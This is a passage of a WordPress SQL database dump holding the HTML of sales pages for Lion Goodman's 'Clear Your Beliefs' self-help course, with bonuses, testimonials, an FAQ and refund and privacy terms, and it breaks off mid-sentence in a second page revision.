href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() { \r\nvar is_chrome = window.chrome; \r\n if (is_chrome) { \r\njQuery(''h5.hdr'').css(''text-size'', ''51px!important'');\r\n jQuery(''h5.hdr'').animate({\r\n    fontSize: ''51px''\r\n }, 100);\r\n } \r\n});\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-18 16:48:06', '2014-06-18 21:48:06', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1029, 2, '2014-06-19 00:50:17', '2014-06-19 05:50:17', '', 'Carista portrait 2', '', 'inherit', 'closed', 'open', '', 'carista-portrait-2', '', '', '2014-06-19 00:50:17', '2014-06-19 05:50:17', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1031, 2, '2014-06-19 00:54:41', '2014-06-19 05:54:41', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind 